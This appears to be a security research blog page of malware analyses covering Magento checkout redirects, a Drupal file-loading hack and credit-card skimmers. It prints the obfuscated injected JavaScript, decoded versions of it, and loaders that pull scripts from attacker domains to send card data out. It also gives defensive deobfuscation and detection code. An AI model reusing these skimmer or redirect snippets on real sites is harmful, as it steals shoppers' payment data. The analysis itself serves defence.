
Sucuri Research Labs

The home of our Security Operations Group, including our Malware Research and Incident Response teams.

We see a strong trend in hacking ecommerce sites in order to hijack the payment process and steal customers' credit card details. During the last couple of years, we wrote multiple times about attacks that target Magento, OpenCart, PrestaShop, WooCommerce and other ecommerce platforms.

Recently we found one more proof of the increased attention hackers are paying to ecommerce sites. On one hacked WordPress site, among other uploaded backdoors, we found quite a big script (>600 lines of code) whose only purpose was to scan the compromised server for online shop sites

Read More ...

The checkout process is one of the most important steps for any e-commerce business. The user experience during this process will set the tone for the entire interaction and hopefully lead to a successful sale. Because of that, attackers have been targeting Magento installations in order to steal sensitive information (credit card data, PayPal logins) and, in this case, to promote websites for their monetary gain.

During our malware investigation process, we found an interesting piece of code redirecting users during the checkout process to a page not intended by the website owner. After selecting the products and clicking on “Proceed to checkout”, the user was redirected to: hxxp://bestdealsweek[.]com

The malicious code was located inside "/js/varien/accordion.js" and here is the content (obfuscated):

var x="\'%kVg\'%YZaVn\'%(9\'%&%%(7%6\'%\'%hZiI^bZdji\'-\'\'YdXjbZci#adXVi^dc#]gZ[(9\',]iie(6$$WZhiYZVahlZZ`#Xdb\',\'\'\'8\'%YZaVn\'.(7",y="",w="",z;z=x['length'];
for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)+11) }w=this['unescape'](y);this['eval'](w);

This file, together with "/skin/frontend/base/default/js/opcheckout.js", creates a JavaScript layer responsible for submitting step data to the checkout controller and interpreting the controller's responses to update the content of the checkout steps. This layer allows the checkout process to be completed without the browser having to load every request as a new page.

This is how the accordion.js was injected into the One Page checkout:

<script type="text/javascript" src="hxxps://domain/js/varien/accordion.js"></script>

After decoding it, we can see the redirect:

var delay = 100;
setTimeout("document.location.href='hxxp://bestdealsweek.com'",delay);

This is one of the many injection techniques attackers have been using against Magento e-commerce sites to make a profit. To reduce the risks of such injections, we recommend keeping all software updated (themes, plugins, core files), using a Website Application Firewall, having a File Integrity Monitoring system to detect file modifications and taking regular backups.
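As an added example (not code from the original post), here is a way to undo this charCode-shift obfuscation without ever calling eval, and to pull the redirect destination out of the decoded text for triage. The sample payload and the redirect-target.example host in it are constructed placeholders, not the real domain:

```javascript
// Added example, not from the original post: decode the accordion.js-style
// obfuscation without eval. The malware adds 11 to every character code,
// runs the result through unescape(), then eval()s it; here we undo the
// first two steps and only return text, so nothing executes.

// Mirrors the sample's `y` and `w` variables but stops before `eval`.
function deobfuscate(x, shift = 11) {
  let y = '';
  for (let i = 0; i < x.length; i++) {
    y += String.fromCharCode(x.charCodeAt(i) + shift);
  }
  return unescape(y); // legacy global, the same call the sample makes
}

// Inverse transform, used only to build a constructed test sample; the
// payload quoted on the page lost some control characters in extraction.
function obfuscate(plain, shift = 11) {
  const escaped = escape(plain);
  let x = '';
  for (let i = 0; i < escaped.length; i++) {
    x += String.fromCharCode(escaped.charCodeAt(i) - shift);
  }
  return x;
}

// Pull redirect destinations out of decoded code for triage (assignment
// to document.location / window.location, with or without .href).
function extractRedirectTargets(code) {
  const re = /(?:document|window)\.location(?:\.href)?\s*=\s*['"]([^'"]+)['"]/g;
  const targets = [];
  let m;
  while ((m = re.exec(code)) !== null) targets.push(m[1]);
  return targets;
}

// Constructed sample with the same shape as the decoded accordion.js
// payload; the destination is a placeholder, not the real domain.
const SAMPLE_PLAIN =
  "var delay = 100;\n" +
  "setTimeout(\"document.location.href='http://redirect-target.example'\",delay);";
const SAMPLE_OBFUSCATED = obfuscate(SAMPLE_PLAIN);

// Decode the sample and report where it would send the browser.
function demo() {
  const decoded = deobfuscate(SAMPLE_OBFUSCATED);
  return { decoded, targets: extractRedirectTargets(decoded) };
}
```

The first three characters of the payload quoted above, `kVg`, decode to `var` with this function, which is a quick way to confirm the shift value before decoding the rest.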

We recently wrote about a Drupal black-hat SEO hack that, among other things, redirected users coming from Google to the botscache[.]com site. It hijacked the bootstrapping process via the session_inc variable in the database, then made Drupal load a malicious file from the global /tmp directory instead of the standard includes/session.inc file.

This malware keeps evolving, and we have found a new variation of it. Again, the only malicious code that could be found within the site structure was just a file name. This time it was in the system table, as the name of the file from which to load a Drupal module. However, the file had a .jpg extension and was loaded from a directory that belonged to a different website under the same server account: ../otherwebsite/sites/default/files/slides/Search.jpg.

Taking a look at that Search.jpg file we can see the following code:

Read More ...

Malware uses encryption, obfuscation and other tricks to evade detection so that compromised sites stay infected for as long as possible. Quite often it's not easy to spot malicious code even when you are looking right at it, especially if you are not a professional programmer or security analyst.

But sometimes the malware is very straightforward. For example, we found this backdoor installer in a file called robots.php in one WordPress theme. It doesn't use any encryption, has properly indented code, and uses clear, descriptive variable names and comments. You shouldn't think twice when you see code like this:

Read More ...

Lately we've been analysing multiple credit card stealers for Magento. We are seeing an increasing trend there, as attackers can more easily monetize a compromised e-commerce site compared to one without credit card data.

This new variation of the CC stealer isn't injected directly into the website but loaded from an external source. Loading the code from another source allows the attacker to modify the malware's source code at will without needing to “reinfect” the site.

Here is a snippet of the code that we found inside Magento's /js/lib/ccard.js:

...
<!-- Google Code for Remarketing Tag -->
if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
{document.write('<script src="hxxps://jquery -cdn .top/mage .js"></script>')};
<!-- Google Code for Remarketing Tag -->

Basically this JavaScript acts like a man-in-the-middle between the user and the checkout process/page: whenever credit card information is submitted, it lets the CMS process it as usual but at the same time forwards the data to a malicious domain at hxxps://jquery-cdn . top/ mag.php.

We also found a slightly different version of the malicious code inside /js/scriptaculous/effects.js:

if((new RegExp('onepage|checkout|onestep|fircheckout')).test(window.location)) {document.write('>tpircs/<>"sj.egam/ue.todstats//:spxxh"=crs tpircs<'.split("").reverse().join(""))}

Putting the code in a readable format we get:

if ((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) {
	document.write('<script src="hxxps:// statsdot. eu/mage.js"></script>')
}

In this case, the script uses the domain hxxps:// statsdot. eu to load the JavaScript, and it sends the credit card data over to hxxps://statsdot .eu /mag.php.

An interesting point about these domains is that attackers are sending the stolen information through secure channels (HTTPS). And, even though credit card information isn't processed directly at your shop, it's very important to ensure that your website is updated and has the latest patches installed.

Moreover, in order to detect, mitigate and prevent such issues from happening, we also recommend having a Website Application Firewall (WAF) in place, keeping regular backups and using a File Integrity Monitoring tool to ensure the integrity of your file system.
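A File Integrity Monitoring alert tells you a core JS file changed; the next question is what was injected. As an added example (not code from the original post), the following static check recognises the checkout-gated loader pattern from both ccard.js and effects.js, including the reversed-string trick, and extracts the external script it would load. The sample inputs and the `*.example` hosts in them are constructed placeholders:

```javascript
// Added example, not from the original post: a static check for the
// checkout-gated loader pattern above. It looks for a RegExp test on
// window.location that names checkout pages, then recovers every external
// <script src> that document.write() would inject, un-reversing literals
// that chain .split("").reverse().join("") as the effects.js variant does.

// (new RegExp('...')).test(window.location), with the pattern captured.
const GATE_RE = /new RegExp\(\s*(['"])(.*?)\1\s*\)\s*\)?\s*\.test\(\s*window\.location\b/;
// document.write('<literal>') optionally followed by the reverse trick.
const WRITE_RE = /document\.write\(\s*(['"])((?:\\.|(?!\1)[^\\])*)\1\s*(\.split\(['"]{2}\)\.reverse\(\)\.join\(['"]{2}\))?/g;
const SRC_RE = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;

function scanForCheckoutLoader(source) {
  const gate = GATE_RE.exec(source);
  const gated = gate !== null && /onepage|checkout|onestep/.test(gate[2]);
  const injectedScripts = [];
  let w;
  while ((w = WRITE_RE.exec(source)) !== null) {
    // Group 3 is present only when the literal is reversed at runtime.
    const html = w[3] ? w[2].split('').reverse().join('') : w[2];
    let s;
    while ((s = SRC_RE.exec(html)) !== null) injectedScripts.push(s[1]);
  }
  return { gated, injectedScripts, suspicious: gated && injectedScripts.length > 0 };
}

// Constructed samples mirroring ccard.js and effects.js; hosts are placeholders.
const SAMPLE_PLAIN_LOADER =
  "if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))\n" +
  "{document.write('<script src=\"https://cdn-lookalike.example/mage.js\"></script>')};";
const REVERSED_TAG =
  '<script src="https://stats-lookalike.example/mage.js"></script>'.split('').reverse().join('');
const SAMPLE_REVERSED_LOADER =
  "if((new RegExp('onepage|checkout|onestep|fircheckout')).test(window.location)) " +
  "{document.write('" + REVERSED_TAG + "'.split(\"\").reverse().join(\"\"))}";
// Legitimate checkout code: a regex on the URL but no injected script.
const SAMPLE_BENIGN = "if (/checkout/.test(window.location.pathname)) { Checkout.init(); }";
```

Run it over every `.js` file under a Magento document root and any `suspicious` hit with a host you do not recognise deserves the same response as the cases above: restore the file from a clean copy and look for the entry point that let it be modified.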

Latest malware entries

Hidden iframes

Latest hidden iframes our scanner has identified on compromised websites.


Conditional redirections

Conditional redirections we have detected (based on user agents or referers).


Spammers

Latest spammers we have detected sending comment, forum or SEO spam.


Encoded javascript

Encoded JavaScript that redirects to Blackhole and other exploit kits, or that builds a remote call.
